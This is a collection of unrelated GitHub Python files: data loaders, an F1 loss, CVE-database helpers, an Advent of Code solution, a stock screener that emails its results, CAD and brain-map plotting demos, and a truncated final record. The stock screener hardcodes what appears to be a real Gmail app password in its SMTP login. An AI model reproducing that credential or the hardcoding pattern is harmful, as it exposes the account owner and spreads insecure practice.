+{"seq_id":"42678599778","text":"from other_imports import *\nfrom configs import AnkaraConfig\n\nclass AnkaraDataset(AnkaraConfig):\n def __init__(self, multispectral = False):\n super(AnkaraDataset, self).__init__()\n \n self.multispectral = multispectral\n self.images_path = self.base_dir + '/Ankara/AnkaraHSIArchive'\n self.labels_path = self.images_path + '/' + 'multilabel.txt'\n \n def load_dataframe(self):\n \n df = pd.read_csv(self.labels_path, delimiter = \"\\t\") \n directories = [x[0] for x in os.walk(self.images_path)][0]\n \n files = glob.glob(os.path.join(directories, '*' + self.extension)) \n df['IMAGE\\LABEL'] = files\n \n if self.multispectral:\n df_ms = df.copy()\n files_multispectral = glob.glob(os.path.join(directories, '*' + self.extension_ms))\n df_ms['IMAGE\\LABEL'] = files_multispectral\n df = df_ms\n df = df.loc[df.values[:, 1:].sum(1) != 0]\n \n return df\n \n","repo_name":"marjanstoimchev/RSMLC","sub_path":"datasets/ankara_dataset.py","file_name":"ankara_dataset.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23879072141","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass F1_Loss(nn.Module):\n\tdef __init__(self, num_classes, epsilon=1e-7):\n\t\tsuper().__init__()\n\t\tself.epsilon = epsilon\n\t\tself.num_classes = num_classes\n\n\tdef forward(self, pred, target):\n\t\tassert pred.dim() == 2\n\t\tassert target.dim() == 1\n\n\t\tpred = torch.softmax(pred, dim=1)\n\t\ttarget = F.one_hot(target, self.num_classes).to(torch.float32)\n\n\t\ttp = (target * pred).sum(dim=0).to(torch.float32)\n\t\ttn = ((1 - target) * (1 - pred)).sum(dim=0).to(torch.float32)\n\t\tfp = ((1 - target) * pred).sum(dim=0).to(torch.float32)\n\t\tfn = (target * (1 - pred)).sum(dim=0).to(torch.float32)\n\n\t\tprecision = tp / (tp + fp + self.epsilon)\n\t\trecall = tp / (tp + fn + self.epsilon)\n\n\t\tf1 = 2* (precision*recall) / (precision + recall + self.epsilon)\n\t\tf1 = f1.clamp(min=self.epsilon, max=1-self.epsilon)\n\t\tf1 = 1 - f1.mean()\n\n\t\treturn f1","repo_name":"ad4529/convex_object_detection","sub_path":"fcos_core/layers/f1_loss.py","file_name":"f1_loss.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32964410014","text":"import pymongo\nimport Utils.CVE_Data as cve_data\n\n\ndef connect_mongodb(ip, port):\n return pymongo.MongoClient(ip, int(port))\n\n\ndef upsert_mongodb(mongo_client, cve, db_name, collection_name):\n db = mongo_client[db_name]\n collection = db[collection_name]\n postid = collection.update_one({'cve.CVE_data_meta.ID' : cve_data.get_cve_id(cve)},\n {\"$set\":{\"cve\" : cve_data.get_cve(cve), \"configurations\" : cve_data.get_configurations(cve), \"impact\" : cve_data.get_impact(cve), \"publishedDate\": cve_data.get_published_date(cve), \"lastModifiedDate\": cve_data.get_last_modified_date(cve)}},\n upsert=True)\n return postid\n\n\ndef find_by_cve(mongo_client, cve_id, db_name, collection_name):\n db = mongo_client[db_name]\n collection = db[collection_name]\n cve = collection.find_one({\"cve.CVE_data_meta.ID\": cve_id})\n return cve\n\n\ndef find_by_name(mongo_client, name, version, db_name, collection_name):\n db = mongo_client[db_name]\n collection = db[collection_name]\n cve = collection.find_one({\"cve.affects.vendor.vendor_data.product.product_data.product_name\": name})\n return cve\n","repo_name":"MotiElbaz/Vulnerabilities-Scanner","sub_path":"Utils/MongoDB.py","file_name":"MongoDB.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"8508915239","text":"#!/usr/bin/python3\n\nimport argparse\nimport requests\nimport time\nfrom typing import List, Generator\n\nfrom pathlib import Path\n\nimport utils\n\n\nLOCAL_DATA_FILE=Path(\"../data/day3.txt\")\nTEST_DATA_FILE=Path(\"../data/day3_test.txt\")\n\ndef read_binary (line, ctx):\n if \"num_bits\" not in ctx:\n ctx[\"num_bits\"] = len(line)\n ctx[\"bit_counts\"] = [0] * ctx[\"num_bits\"]\n \n for i, bit in enumerate(line):\n if bit == \"1\":\n ctx[\"bit_counts\"][i] += 1\n else:\n assert bit == \"0\"\n\n ctx[\"count\"] += 1\n\n return int(line, 2)\n\ndef run_p1 (datafile):\n ctx = {\"count\": 0}\n l = list(utils.read_input(datafile, read_binary, ctx))\n print(ctx)\n gamma = int(\n \"\".join(\"0\" if bit < ctx[\"count\"] // 2 else \"1\"\n for bit in ctx[\"bit_counts\"]),\n 2\n )\n epsilon = int(\n \"\".join(\"1\" if bit < ctx[\"count\"] // 2 else \"0\"\n for bit in ctx[\"bit_counts\"]),\n 2\n )\n\n\n print(gamma, epsilon, gamma * epsilon)\n\n\ndef main ():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--tests',\n action='store_true',\n help='Run tests')\n args = parser.parse_args()\n\n\n if args.tests:\n run_p1(TEST_DATA_FILE)\n else:\n run_p1(LOCAL_DATA_FILE)\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"78thomasd/aoc2021","sub_path":"puzzles/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3182879260","text":"import pandas as pd\nimport datetime\nimport yfinance as yf\nimport email\n\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom datetime import date\nimport statsmodels.api as sm\nimport getFamaFrenchFactors as gff\n\ndf_SMA = pd.DataFrame()\ndf_EMA = pd.DataFrame()\ndf_ADX = pd.DataFrame()\ndf_RSI = pd.DataFrame()\ndf_expected_yearly_return = pd.DataFrame()\n\n# def get_stock_list():\n# # this is the website we're going to scrape from\n# url = \"https://www.malaysiastock.biz/Stock-Screener.aspx\"\n# response = requests.get(url, headers={'User-Agent':'test'})\n# soup = BeautifulSoup(response.content, \"html.parser\")\n# table = soup.find(id = \"MainContent2_tbAllStock\")\n# # return the result (only ticker code) in a list\n# return [stock_code.get('href')[-4:] for stock_code in table.find_all('a')]\n\ncompany_name = []\ncompany_ticker = []\nSMA_screened_list = []\nEMA_screened_list = []\n\n\n# Create a function to scrape the data\n# def scrape_stock_symbols(Letter):\n# Letter = Letter.upper()\n# URL = 'https://www.advfn.com/nyse/newyorkstockexchange.asp?companies='+Letter\n# page = requests.get(URL)\n# soup = BeautifulSoup(page.text, \"html.parser\")\n# odd_rows = soup.find_all('tr', attrs= {'class':'ts0'})\n# even_rows = soup.find_all('tr', attrs= {'class':'ts1'})\n# for i in odd_rows:\n# row = i.find_all('td')\n# company_name.append(row[0].text.strip())\n# company_ticker.append(row[1].text.strip())\n# for i in even_rows:\n# row = i.find_all('td')\n# company_name.append(row[0].text.strip())\n# company_ticker.append(row[1].text.strip())\n# return company_name, company_ticker\n\n\ndef send_email(email_message, email_subject, attachment=None):\n msg = email.message_from_string(\", \".join(email_message))\n msg = MIMEMultipart(\"alternative\")\n msg['From'] = 'xxxxxxx@gmail.com'\n msg['To'] = 'xxxxxxx@gmail.com'\n msg['Subject'] = email_subject\n\n if attachment != None:\n part2 = MIMEText(attachment, \"html\")\n msg.attach(part2)\n\n email_from = 'xxxxxxx@gmail.com'\n email_to = 'xxxxxxx@gmail.com'\n s = smtplib.SMTP(\"smtp.gmail.com\", 587)\n ## for yahoo mail user: s = smtplib.SMTP(\"smtp.mail.yahoo.com\",587)\n ## for hotmail user: s = smtplib.SMTP(\"smtp.live.com\",587)\n s.ehlo()\n s.starttls()\n s.ehlo()\n s.login(email_from, \"ffvyyfbxjxkggllmwv\")\n s.sendmail(email_from, [email_to], msg.as_string())\n s.quit()\n\n\ndef get_stock_price(code):\n # you can change the start date\n start_date = datetime.datetime.now() - datetime.timedelta(days=365) # one year ago\n data = yf.download(code, start=start_date)\n return data\n\n\ndef SMA_screener(close, days):\n return close.rolling(window=days).mean()\n\n\ndef percent_change(close):\n return close.pct_change()\n\n\ndef add_EMA(price, day):\n return price.ewm(span=day).mean()\n\n\ndef add_STOCH(close, low, high, period, k, d=0):\n STOCH_K = ((close - low.rolling(window=period).min()) / (\n high.rolling(window=period).max() - low.rolling(window=period).min())) * 100\n STOCH_K = STOCH_K.rolling(window=k).mean()\n if d == 0:\n return STOCH_K\n else:\n STOCH_D = STOCH_K.rolling(window=d).mean()\n return STOCH_D\n\n\ndef check_bounce_EMA(df):\n candle1 = df.iloc[-1]\n candle2 = df.iloc[-2]\n cond1 = candle1['EMA18'] > candle1['EMA50'] > candle1['EMA100']\n cond2 = candle1['STOCH_%K(5,3,3)'] <= 30 or candle1['STOCH_%D(5,3,3)'] <= 30\n cond3 = candle2['Low'] < candle2['EMA50'] and \\\n candle2['Close'] > candle2['EMA50'] and \\\n candle1['Low'] > candle1['EMA50']\n return cond1 and cond2 and cond3\n\n\ndef get_rsi(Close, lookback):\n ret = Close.diff()\n up = []\n down = []\n\n for i in range(len(ret)):\n if ret[i] < 0:\n up.append(0)\n down.append(ret[i])\n else:\n up.append(ret[i])\n down.append(0)\n\n up_series = pd.Series(up)\n down_series = pd.Series(down).abs()\n\n up_ewm = up_series.ewm(com=lookback - 1, adjust=False).mean()\n down_ewm = down_series.ewm(com=lookback - 1, adjust=False).mean()\n\n rs = up_ewm / down_ewm\n rsi = 100 - (100 / (1 + rs))\n rsi_df = pd.DataFrame(rsi).rename(columns={0: 'rsi'}).set_index(Close.index)\n rsi_df = rsi_df.dropna()\n\n return rsi_df[3:]\n\ndef get_adx(High, Low, Close, lookback):\n plus_dm = High.diff()\n minus_dm = Low.diff()\n plus_dm[plus_dm < 0] = 0\n minus_dm[minus_dm > 0] = 0\n\n tr1 = pd.DataFrame(High - Low)\n tr2 = pd.DataFrame(abs(High - Close.shift(1)))\n tr3 = pd.DataFrame(abs(Low - Close.shift(1)))\n frames = [tr1, tr2, tr3]\n tr = pd.concat(frames, axis=1, join='inner').max(axis=1)\n atr = tr.rolling(lookback).mean()\n\n plus_di = 100 * (plus_dm.ewm(alpha=1 / lookback).mean() / atr)\n minus_di = abs(100 * (minus_dm.ewm(alpha=1 / lookback).mean() / atr))\n dx = (abs(plus_di - minus_di) / abs(plus_di + minus_di)) * 100\n adx = ((dx.shift(1) * (lookback - 1)) + dx) / lookback\n adx_smooth = adx.ewm(alpha=1 / lookback).mean()\n return plus_di, minus_di, adx_smooth\n\n#Calculate the On Balance Volume\ndef calc_OBV(close, volume):\n OBV = []\n OBV.append(0)\n for i in range(1, len(close)):\n if close[i] > close[i-1]: #If the closing price is above the prior close price\n OBV.append(OBV[-1] + volume[i]) #then: Current OBV = Previous OBV + Current Volume\n elif close[i] < close[i-1]:\n OBV.append( OBV[-1] - volume[i])\n else:\n OBV.append(OBV[-1])\n return OBV\n\n #Calculate OBV EMA\n def calc_obv_ema(obv):\n #Store the OBV and OBV EMA into new columns\n return obv.ewm(com=20).mean()\n\ndef get_expected_return(adj_close):\n ff3_monthly = gff.famaFrench3Factor(frequency='m')\n ff3_monthly.rename(columns={\"date_ff_factors\": 'Date'}, inplace=True)\n ff3_monthly.set_index('Date', inplace=True)\n\n stock_returns = adj_close.resample('M').last().pct_change().dropna()\n stock_returns.name = \"Month_Rtn\"\n ff_data = ff3_monthly.merge(stock_returns, on='Date')\n\n X = ff_data[['Mkt-RF', 'SMB', 'HML']]\n y = ff_data['Month_Rtn'] - ff_data['RF']\n X = sm.add_constant(X)\n ff_model = sm.OLS(y, X).fit()\n # print(ff_model.summary())\n intercept, b1, b2, b3 = ff_model.params\n\n rf = ff_data['RF'].mean()\n market_premium = ff3_monthly['Mkt-RF'].mean()\n size_premium = ff3_monthly['SMB'].mean()\n value_premium = ff3_monthly['HML'].mean()\n\n expected_monthly_return = rf + b1 * market_premium + b2 * size_premium + b3 * value_premium\n expected_yearly_return = expected_monthly_return * 12\n return(str(expected_yearly_return))\n\n# string.ascii_uppercase\n\n# Loop through every letter in the alphabet to get all of the tickers from the website\n# for char in string.ascii_uppercase:\n# (temp_name,temp_ticker) = scrape_stock_symbols(char)\nstart_time = datetime.datetime.now()\n# ticker_file = open(r\"C:\\Users\\sudhi\\Documents\\Algorithmic_Trading\\NYSE.txt\", \"r\")\n# ticker_list = []\n# for item in ticker_file:\n# ticker = item.split()[0]\n# ticker_list.append(ticker)\n\nticker_list = pd.read_csv(\"stockanalysis_dot_com.csv\")\n\nfor stock_code in ticker_list['ticker']:\n try:\n # Step 1: get stock price for each stock\n price_chart_df = get_stock_price(stock_code)\n\n close = price_chart_df['Close']\n low = price_chart_df['Low']\n open = price_chart_df['Open']\n high = price_chart_df['High']\n volume = price_chart_df['Volume']\n adj_close = price_chart_df['Adj Close']\n\n price_chart_df['SMA_7'] = SMA_screener(close, 7)\n price_chart_df['SMA_7_PCT_CHG'] = price_chart_df['SMA_7'].pct_change()\n price_chart_df['SMA_20'] = SMA_screener(close, 20)\n price_chart_df['SMA_50'] = SMA_screener(close, 50)\n price_chart_df['SMA_200'] = SMA_screener(close, 200)\n price_chart_df['percent_change'] = percent_change(close)\n\n expected_yearly_returns = get_expected_return(adj_close)\n\n df1_expected_yearly_return = {\n 'ticker' : stock_code,\n 'yearly_return' : expected_yearly_returns,\n }\n df_expected_yearly_return = df_expected_yearly_return.append(df1_expected_yearly_return, ignore_index=True)\n\n\n\n\n if price_chart_df['percent_change'].iloc[-1] > 0 \\\n and price_chart_df['SMA_7_PCT_CHG'].iloc[-1] > 0 \\\n and price_chart_df['Close'].iloc[-1] > price_chart_df['SMA_7'].iloc[-1] \\\n and price_chart_df['SMA_7'].iloc[-1] > price_chart_df['SMA_20'].iloc[-1] \\\n and price_chart_df['SMA_20'].iloc[-1] > price_chart_df['SMA_50'].iloc[-1] \\\n and price_chart_df['SMA_50'].iloc[-1] > price_chart_df['SMA_200'].iloc[-1]:\n SMA_screened_list.append(stock_code)\n price_chart_df['EMA18'] = add_EMA(close, 18)\n price_chart_df['EMA50'] = add_EMA(close, 50)\n price_chart_df['EMA100'] = add_EMA(close, 100)\n price_chart_df['STOCH_%K(5,3,3)'] = add_STOCH(close, low,\n high, 5, 3)\n price_chart_df['STOCH_%D(5,3,3)'] = add_STOCH(close, low,\n high, 5, 3, 3)\n\n # calculate standard deviation\n standard_deviation = close.std()\n\n\n price_chart_df['OBV'] = calc_OBV(close, volume)\n price_chart_df['OBV_EMA'] = calc_obv_ema(price_chart_df['OBV'])\n\n # Calculate ADX\n price_chart_df['plus_di'] = pd.DataFrame(\n get_adx(high, low, close, 14)[0]).rename(\n columns={0: 'plus_di'})\n price_chart_df['minus_di'] = pd.DataFrame(\n get_adx(high, low, close, 14)[1]).rename(\n columns={0: 'minus_di'})\n price_chart_df['adx'] = pd.DataFrame(\n get_adx(high, low, close, 14)[2]).rename(\n columns={0: 'adx'})\n\n\n # Calculate RSI\n price_chart_df['rsi_14'] = get_rsi(close, 14)\n\n\n if price_chart_df['adx'].iloc[-1] >= 40:\n df1_ADX = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_ADX = df_ADX.append(df1_ADX, ignore_index=True)\n\n\n if price_chart_df['rsi_14'].iloc[-1] <= 35:\n df1_RSI = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_RSI = df_RSI.append(df1_RSI, ignore_index=True)\n\n\n df1_SMA = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_SMA = df_SMA.append(df1_SMA, ignore_index=True)\n\n # if all 3 conditions are met, add stock into screened list\n if check_bounce_EMA(price_chart_df):\n EMA_screened_list.append(stock_code)\n print(EMA_screened_list)\n\n\n \n df1_EMA = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_EMA = df_EMA.append(df1_EMA, ignore_index=True)\n\n\n except Exception as e:\n print(e)\n\n\n\n# sort top 10 with least variance at the top\nif 'RSI_14' in df_SMA:\n df_SMA = df_SMA.sort_values(by=['RSI_14'])\nif 'RSI_14' in df_EMA:\n df_EMA = df_EMA.sort_values(by=['RSI_14'])\n\n\nif 'adx' in df_ADX:\n df_ADX = df_ADX.sort_values(by=['adx'], ascending=False)\n\nif 'rsi' in df_RSI:\n df_RSI = df_RSI.sort_values(by=['rsi'], ascending=True)\n\ndf_expected_yearly_return = df_expected_yearly_return.sort_values(by=['yearly_return'], ascending=False)\n\n\ntext = 'Attached is the CSV file'\nemail_df_SMA = df_SMA.to_html()\ndf_SMA.to_csv('SMA_History.csv', mode='a', header=False)\nemail_df_EMA = df_EMA.to_html()\nemail_df_ADX = df_ADX.to_html()\nemail_df_RSI = df_RSI.to_html()\nemail_df_expected_yearly_return = df_expected_yearly_return.to_html()\n\n# send_email(SMA_screened_list, 'SMA_Screener_today')\nsend_email(text, 'SMA_Screener_table_today', attachment=email_df_SMA)\nsend_email(text, 'EMA_Screener_table_today', attachment=email_df_EMA)\nsend_email(text, 'ADX >= 40', attachment=email_df_ADX)\nsend_email(text, 'RSI <= 35', attachment=email_df_RSI)\nsend_email(text, 'Expected Yearly Return', attachment=email_df_expected_yearly_return)\n\nend_time = datetime.datetime.now()\nprint('start time - {} \\n end time - {}'.format(start_time, end_time))\n","repo_name":"sudhirz/Algo_Trading_Analysis","sub_path":"stock_screener_main.py","file_name":"stock_screener_main.py","file_ext":"py","file_size_in_byte":17168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70791030888","text":"import ezdxf\n\ndoc = ezdxf.new('R2007', setup=True)\nmsp = doc.modelspace()\ny = 0\n\nfor index, name in enumerate(sorted(ezdxf.ARROWS.__all_arrows__)):\n if name == \"\":\n label = '\"\" = closed filled'\n else:\n label = name\n y = index * 2\n\n def add_connection_point(p):\n msp.add_circle(p, radius=0.01, dxfattribs={'color': 1})\n msp.add_text(label, {'style': 'OpenSans', 'height': .25}).set_pos((-5, y - .5))\n msp.add_line((-5, y), (-1, y))\n msp.add_line((5, y), (10, y))\n # left side |<- is the reverse orientation\n cp1 = msp.add_arrow(name, insert=(0, y), size=1, rotation=180, dxfattribs={'color': 7})\n # right side ->| is the base orientation\n cp2 = msp.add_arrow(name, insert=(4, y), size=1, rotation=0, dxfattribs={'color': 7})\n msp.add_line(cp1, cp2)\n add_connection_point(cp1)\n add_connection_point(cp2)\n\n add_connection_point(msp.add_arrow_blockref(name, insert=(7, y), size=.3, rotation=45))\n add_connection_point(msp.add_arrow_blockref(name, insert=(7.5, y), size=.3, rotation=135))\n add_connection_point(msp.add_arrow_blockref(name, insert=(8, y), size=.5, rotation=-90))\n\n\nmsp.add_line((0, 0), (0, y))\nmsp.add_line((4, 0), (4, y))\nmsp.add_line((8, 0), (8, y))\n\ndoc.saveas('all_arrows_{}.dxf'.format(doc.acad_release))\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"examples/render/show_all_arrows.py","file_name":"show_all_arrows.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28307839681","text":"import matplotlib\nmatplotlib.use('Agg')\n\nimport numpy as np\nimport pylab as pl\nimport nibabel as nb\n\n# Utilities for colormaps\nfrom matplotlib import cm as _cm\nfrom matplotlib import colors as _colors\n\nfrom scipy.stats import scoreatpercentile\nfrom sklearn.preprocessing import StandardScaler\nfrom nilearn.image.image import _smooth_array\nfrom nipy.labs.viz import plot_map\nfrom nipy.labs.viz_tools import cm\nfrom nipy.labs.viz_tools import anat_cache\n\n\ndef alpha_cmap(color):\n \"\"\" Return a colormap with the given color, and alpha going from\n zero to 1.\n \"\"\"\n red, green, blue = color[:3]\n cmapspec = [(red, green, blue, 0.),\n (red, green, blue, 1.),\n ]\n cmap = _colors.LinearSegmentedColormap.from_list(\n 'alpha', cmapspec, _cm.LUTSIZE)\n cmap._init()\n cmap._lut[:, -1] = np.linspace(.5, .75, cmap._lut.shape[0])\n cmap._lut[-1, -1] = 0\n return cmap\n\n\ndef plot_bg(cut_coords=None, title=None):\n anat, anat_affine, anat_max = anat_cache._AnatCache.get_anat()\n figure = pl.figure(figsize=(8, 2.6), facecolor='w', edgecolor='w')\n ax = pl.axes([.0, .0, .85, 1], axisbg='w')\n slicer = plot_map(anat,\n anat_affine,\n cmap=pl.cm.gray,\n vmin=.1 * anat_max,\n vmax=.8 * anat_max,\n figure=figure,\n cut_coords=cut_coords,\n axes=ax, )\n slicer.annotate()\n slicer.draw_cross()\n if title:\n slicer.title(title, x=.05, y=.9)\n return slicer\n\n\ndef plot_contour_atlas(niimgs, labels, cut_coords=None,\n title=None, percentile=99):\n legend_lines = []\n slicer = plot_bg(cut_coords, title)\n atlas = np.vstack([niimg.get_data()[np.newaxis] for niimg in niimgs])\n # atlas = StandardScaler().fit_transform(atlas.T).T\n affine = niimgs[0].get_affine()\n for i, (label, data) in enumerate(zip(labels, atlas)):\n data = np.array(_smooth_array(data, affine, 5), copy=True)\n data[data < 0] = 0\n color = np.array(pl.cm.Set1(float(i) / (len(labels) - 1)))\n # data, affine = niimg.get_data(), niimg.get_affine()\n # affine = niimg.get_affine()\n level = scoreatpercentile(data.ravel(), percentile)\n slicer.contour_map(data, affine, levels=(level, ),\n linewidth=2.5, colors=(color, ))\n slicer.plot_map(data, affine, threshold=level,\n cmap=alpha_cmap(color))\n legend_lines.append(pl.Line2D([0, 0], [0, 0],\n color=color, linewidth=4))\n\n ax = slicer.axes['z'].ax.get_figure().add_axes([.80, .1, .15, .8])\n pl.axis('off')\n ax.legend(legend_lines, labels, loc='center right',\n prop=dict(size=4), title='Labels',\n borderaxespad=0,\n bbox_to_anchor=(1 / .85, .5))\n atlas = np.rollaxis(atlas, 0, 4)\n return nb.Nifti1Image(atlas, affine=affine)\n\n\ndef plot_label_atlas(niimgs, labels, cut_coords=None, title=None):\n slicer = plot_bg(cut_coords, title)\n n_maps = len(niimgs)\n\n data = np.array([niimg.get_data() for niimg in niimgs])\n affine = niimgs[0].get_affine()\n mask = np.any(data, axis=0)\n atlas = np.zeros(mask.shape, dtype='int')\n # atlas[mask] = np.argmax(np.abs(data), axis=0)[mask]\n atlas[mask] = np.argmax(data, axis=0)[mask] + 1\n colors = (np.arange(n_maps) + 1) / float(n_maps)\n colors = np.hstack([colors, [0]])\n slicer.plot_map(np.ma.masked_equal(colors[atlas], 0),\n affine,\n cmap=pl.cm.spectral, )\n\n legend_lines = [pl.Line2D([0, 0], [0, 0],\n color=pl.cm.spectral(color), linewidth=4)\n for color in colors]\n\n ax = slicer.axes['z'].ax.get_figure().add_axes([.80, .1, .15, .8])\n pl.axis('off')\n ax.legend(legend_lines, labels, loc='center right',\n prop=dict(size=4), title='Labels',\n borderaxespad=0,\n bbox_to_anchor=(1 / .85, .5))\n return nb.Nifti1Image(atlas, affine=affine)\n\n\nif __name__ == '__main__':\n import os\n import glob\n import nibabel as nb\n\n data_dir = '/tmp/reporter'\n niimgs = [nb.load(img)\n for img in glob.glob(os.path.join(data_dir, '*.nii.gz'))]\n labels = [os.path.split(img)[1].split('.nii.gz')[0]\n for img in glob.glob(os.path.join(data_dir, '*.nii.gz'))]\n # plot_contour_atlas(niimgs, labels, (61, -20, 3), 'atlas', 99)\n plot_label_atlas(niimgs, labels, (61, -20, 3), 'atlas')\n\n pl.show()\n","repo_name":"schwarty/nignore","sub_path":"viz_utils.py","file_name":"viz_utils.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38100316663","text":"import os\nfrom dotenv import load_dotenv, find_dotenv\nimport psycopg2\nimport sys\n\ndef ConnectDB_Checker():\n \n ValueResponse = \"OK\"\n \n load_dotenv(find_dotenv()) \n try: \n conn = psycopg2.connect( \n user = os.getenv(\"DATABASE_USERNAME\"), \n password = os.getenv(\"DATABASE_PASSWORD\"), \n host = os.getenv(\"DATABASE_IP\"), \n port = os.getenv(\"DATABASE_PORT\"), \n database = os.getenv(\"DATABASE_NAME\") \n )\n conn.close()\n except psycopg2.Error as e:\n ValueResponse = e\n print(e)\n # sys.exit(1)\n\n # # Execute a SQL query\n # try:\n # cur = conn.cursor()\n # cur.execute('SELECT version()')\n # except psycopg2.Error as e:\n # ValueResponse = e\n # print(e)\n # sys.exit(1)\n\n # # Fetch the results\n # try:\n # rows = cur.fetchall()\n # except psycopg2.Error as e:\n # ValueResponse = e\n # print(e)\n # sys.exit(1)\n\n # # Close the connection\n # try:\n # conn.close()\n # except psycopg2.Error as e:\n # ValueResponse = e\n # print(e)\n # sys.exit(1)\n\n return ValueResponse","repo_name":"FlorentBch/ProjetEntrepriseMaritime","sub_path":"Application/DataBase/CheckerDB.py","file_name":"CheckerDB.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36404199027","text":"#https://www.hackerrank.com/challenges/journey-to-the-moon/problem\n\ndef find_set_index(a):\n for i in 